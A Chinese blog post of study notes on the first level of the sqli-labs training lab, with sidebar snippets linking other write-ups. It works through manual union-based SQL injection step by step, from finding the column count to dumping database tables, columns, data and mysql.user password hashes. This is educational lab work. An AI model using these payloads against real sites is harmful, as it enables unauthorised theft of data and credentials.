sql_libs第一关

最新推荐文章于 2024-07-24 23:19:51 发布
最新推荐文章于 2024-07-24 23:19:51 发布
阅读量1k 收藏 1
点赞数
分类专栏: # Sqllibs_master
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901038/article/details/92399712
版权

第一关通关笔记:2019/6/16

低等级详解的相关网站:https://www.jianshu.com/p/078df7a35671

http://www.storysec.com/dvwa-sql-injection.html

dvwa的闯关:https://www.freebuf.com/articles/web/120747.html

BP:https://blog.csdn.net/qq_36706878/article/details/79677078

一、判断是数值型还是字符型漏洞注入

输入:?id=1,id=1’(包含引号),如果后者报错,那么表明为字符型注入()

判断注入:

1  页面正常
1' 页面返回错误:报错:“......use near ''1''' at line 1...”
1' and '1'='1 页面正常
1' or '1'='2 页面错误

判断为字符型注入

?id=1’ and ‘1’=’2

 

二、手工注入

(末尾加上#号或者--%20(%20代表空格,由于某些浏览器可能会过滤掉了空格,所以用%20))

1、使用确定列数(字段)  (order by)

?id=1’ order by (+数字):

不断的去试数字,直到报错后,再利用二分法缩小范围去寻找最终的列数。

例如:在这里  10:error;那么接下来,5:error;再接下来:2:right;3:right;4:error;那么最终的列数将为3列。)

 

(缺少图片)

 

2、找出数据库名(database())

?id=-1‘ union select 1,2,3

看页面的显示结果(由于此页面只能显示一个数据,即当运行?id=1‘ union select 1,2,3时,她只能显示id=1的数据,而无法显示后面的数据,所以我们要将id=1变为id=-1,即id的数找不到为空,则将会显示后面的查询结果:union select 1,2,3

 

(缺少图片:your login:2,password:3)

 

即:2的结果显示在your login的位置上;3的结果显示在password上;那么将我们想要显示的放在2和3的位置上即可

使用database()函数找出数据库名称

?id=-1‘ union select 1,database(),3

(数据库名显示在2的位置上,即数据库名为:security)

 

3、找出对应的表:

使用information_schema.tables(输出表名信息):

information_schema   是 mysql 自带的一张表,这张数据表保存了 Mysql 服务器所有数据库的信息,如数据库名,数据库的表,表栏的数据类型与访问权限等。该数据库拥有一个名为 tables 的数据表,该表包含两个字段 table_name 和 table_schema,分别记录 DBMS 中的存储的表名和表名所在的数据库。

(MySQL中表的相关信息:https://www.cnblogs.com/hfdp/p/5549384.html)

?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema="security" --%20 (s输出单个表)

 

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --%20(输出所有表)

【也可使用:?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema="security"  limit 0,1 --%20(一个表一个表的输出,PS:limit后面不需要加括号)】

(函数group_concat的用法:https://hchmsguo.iteye.com/blog/555543

 

4、找出对应的列:

使用information_schema.columns输出字段信息:

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema="security" --%20(输出information_schema.column表中的column_name字段)

由上可以发现有很多的重复的id,即表示输出的是所有表的列,

若要查询emails表中的列名:?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="emails" --%20

 

5、找出所需要的数据

例如:查找emails表中的数据;

?id=1’  union  select  1,group_concat ( id, email_id ) ,3  from  emails  --%20

(也可以使用:concat_ws(char(32,58,32),id,email_id)去代替group_concat ( id, email_id )效果相差不大,char(32,58,32)起到一个分割的作用,32代表空格,58代表冒号:,如果所有页面都显示的话,用concat_ws( ) 输出的比较明显,它会将每一条信息一个一个的输出,而 group_concat 会直接输出 )

 

以下为步骤为从dvwa之后的演练部分:

参照:http://www.storysec.com/dvwa-sql-injection.html(其中包括读文件和写入拿webshell)

6、猜root用户

1' union select 1,group_concat(user,password) from mysql.user#

注释:

mysql.user相关信息:https://blog.csdn.net/zmx729618/article/details/78026497/

 

2019/7/5

MySQL中常用SQL注入整理:http://www.111cn.net/database/mysql/58518.htm

1、SQL注入测试:

一般的注入语句为:

select * from table where id=1

因此可以利用以下判断测试:

1 页面正常
1' 页面返回报错:"...use near ''1''' at line 1..."
1' and '1'='1页面正常
1' and 1=1 页面错误
1' and 1=1# 页面正常

 由以上可以判断该错误是单引号字符型字符型错误。

在sqllib闯关时将会发先闭合方式有很多种,包括 ' id '、" id "、( ' id ' )、( " id " )等等,所以应该根据实际情况来定。

 

 

xor0ne_10_01
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Sql-labs 第一关超详细讲解
A9874564的博客
02-21 6082
一.Sql注入含义 所谓的sql注入就是通过某种方式将恶意的sql代码添加到输入参数中,然后传递到sql服务器使其解析并执行的一种攻击手法。 二.注入思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三.判断是否存在注入点 ...
Sqli-libs通关详解__第一关
henghengzhao_的博客
10-04 909
sqli-libs通关详解,第一关通关详解
sql-libs通关详解
最新发布
hanjinming110的博客
07-24 1307
sql-libs靶场的打靶过程
Sql-labs的第一关
繁星
06-07 635
Sql注入要求我们对数据库的结构要有一个大概的了解,这要就能更容易去操作!!!
疑问点sqlilibs 第一关
weixin_45821250的博客
11-28 450
疑问点sqlilibs 第一关的注入时我发现了这样的问题 http://192.168.59.130/sqlilabs/Less-1/?id=-1%27%20union%20select%201,2,(select%20gruop_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7365637572697479)--+ http://192.168.59.130/sqlilabs/Less-1/?i
sqli-libs Page-1解题笔记
weixin_46262057的博客
03-29 4220
开始说明: 本次文章所需要的技术借鉴了B站大佬crowsec录制视频时所用的技术,旨在记录所学成果,同时我也会附上自己的总结心得,还望诸位大佬多多指正。本次所需工具为hackbar;我这里使用的靶场为buu靶场,所以无环境搭建过程。 第一关 作为一个刚接触的sql注入的小白来讲,构造payload语句简直要了老命,十分难记。不过没有办法,多多练习。 看第一关的名字,single quote:单引号; 我们先打卡harkbar或者直接用url传参,?id=1 --+ 看看效果; 这里为啥用–+呢,因为我们
Android下访问SQL2008
01-21
首先,我们需要理解的是,由于Android系统原生并不支持直接与SQL Server 2008通信,因此需要借助第三方库或服务来实现这一目标。其中,JDBC(Java Database Connectivity)驱动是一个常见的选择,但Android并不直接...
mysql-community-libs-8.0.20-1.el7.x86_64_community_MYSQL_源码
10-04
本文将深入探讨“mysql-community-libs-8.0.20-1.el7.x86_64.rpm”这个软件包,它是MySQL社区版的一个组件,主要包含MySQL的库文件。 首先,我们来看看“mysql-community-libs”。这个组件是MySQL社区服务器的库...
xquery-libs:各种XQuery库
05-17
"xquery-libs"是一个集合,包含了多种用于扩展XQuery功能的库,特别适合于与第三方Web服务进行集成。下面将详细探讨XQuery及其相关库的重要知识点。 1. **XQuery基础**:XQuery的核心在于其表达式语法,允许用户以...
activiti-5.17.0-第一卷
07-11
这个资源是 Activiti 的 5.17.0 版本的第一卷,由于文件大小的原因,整个包被分成了两部分进行上传。这一部分包含了数据库相关的文件、库文件(libraries)以及文档(documents)。 1. **数据库**:在 `database` ...
sqlilabs第一关懵逼小解答
zlloveyouforever的博客
03-13 4937
sqlilabs第一关新手大解惑,小白看过来,大佬不要来。绝对很详细哦,骗你是修勾。
sqli-labs一第一关详细步骤,新手打基础篇
qq_50956249的博客
03-21 606
5、查出数据库名称后,爆破表名,union 1,group_concat(table_name),3,…union 1,2,group_concat(column_name),…7、查出了具体的字段名,最后一步就是查出具体的数据了,union 1,2,group _concat(username,id,password) from users–+4、先查出使用的是哪个数据库,用database()函数,以及数据库版本信息,用version()函数。输入1’–+,有用户显示。输入 1,有用户显示。
sqlilab第一关
qq_45491497的博客
07-28 2000
1.判断注入方式为字符型 输入正常id=1 注入引号 可以推断查询语句为select * from users where id=1 limit 0,1; (ps:users表只是举例) 打开第一关的php源码查看结果 打开数据库命令行查询结果 2.查询库名 <1>判断表有几列 当输入order by 3时未报错,而order by 4报错,说明表有三列 <2>判断回显的位置 为了union后的语句可生效,需将之前的报错,改为-1 se.
sql-libs(1) -字符型注入
weixin_30384217的博客
08-08 231
关于sql-libs的安装就不做过多的说明, 环境:win7虚拟机 192.168.48.130(NAT连接),然后用我的win10物理机去访问。 直接加 ' 报错,后测试 and '1'='1 成功返回,1=2错误, 是基于字符型的注入 order by 3--+ 返回正常, 4的时候错误,得到字段为3, --+是注释符号http://192.168.48.1...
sqli-labs第一关
2402_82441920的博客
07-03 520
sqli-labs 第一关是一个关于 SQL 注入的挑战。以下是一般情况下的通关摘要: 判断是否存在注入点:在 URL 中?id=1 后面加上单引号,观察页面是否报错。如果报错,说明此处没有过滤掉引号,存在注入点。 判断注入类型:分析报错语句,根据引号的情况判断是字符型注入还是整型注入。在此关中,报错信息中有多个单引号,说明是字符型注入。 判断字段数(列数):使用 order by 加数字的方式进行试探,直到出现报错,从而确定表中的字段数。例如?id=1' order by 4 –+报错,说明有 3 列。
sqllib闯关攻略_01
Xor0ne
07-10 1761
1.Less_01 1.1、寻找报错点,观察闭合方式 在网站上不断地进行奇怪字符串添加看是否产生报错显示,报错后,再添加注释符查看是否还会报错。 http://192.168.31.61:8081/sqli-labs-master/Less-1/?id=1 http://192.168.31.61:8081/sqli-labs-master/Less-1/?id=1’ 【单引号】 http://192.168.31.61:8081/sqli-labs-master/Less-1/?id=1” 【双引
sqli-labs系列——第一关
1匹黑马
04-26 3937
文章目录判断注入类型开始注入 判断注入类型 首先判断是什么类型的注入,这里是字符型的: 1' and '1'='1 //正常 1' and '1'='2 //错误 开始注入 末尾的注释符#被过滤,所以报错了: URL编码绕过,列长度为3: 爆注入点: 'union SELECT 1,2,3%23 爆表名: http://192.168.1.113:86/Less-1/?id='uni...
sqli-labs第一关的闯关
qq_45154529的博客
01-05 2085
第一关:单引号错误 SQL的注入最终是为了拿到数据库的文件或者数据。 刚进页面,显示需要输入id。 于是我们使用在地址栏后面加上 ?id=1 第二行的黄色字体是我自己添加的内容,表示被传入mysql执行的语句(方便我加深理解),绿色字体是正常显示的内容。 如果你也想要显示此语句,可以在安装目录下的此页面的php当中,加入这条语句 echo “$sql” 判断有无注入点: 老规矩:加上and 1=1;and 1=2,看一下回显有没有不同。没有!说明其在sql中不是单纯应用数值作为参数。
sqli_labs第一关
qq726232111的博客
08-11 1685
小萌新入坑,从sqli-labs开始搞起 Less-1 提示:测试时要使用英文模式下字符!!!!!!要仔细查看是否字符有误导致无法返回信息!!!!! 0x0 信息分析 搭建好环境后来到Less-1的页面查看页面提示信息并分析 此时可以看到给出的提示信息 Please input the ID as parameter with numeric value 翻译 请输入ID作为...
OpenCV_STATIC_LIBS和OpenCV_LIBS的区别
04-05
OpenCV_STATIC_LIBS和OpenCV_LIBS都是用于指定OpenCV库文件...因此,如果需要在多个平台上使用同一个可执行文件,则应该使用OpenCV_LIBS。如果需要在特定平台上使用最小的可执行文件,则应该使用OpenCV_STATIC_LIBS
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值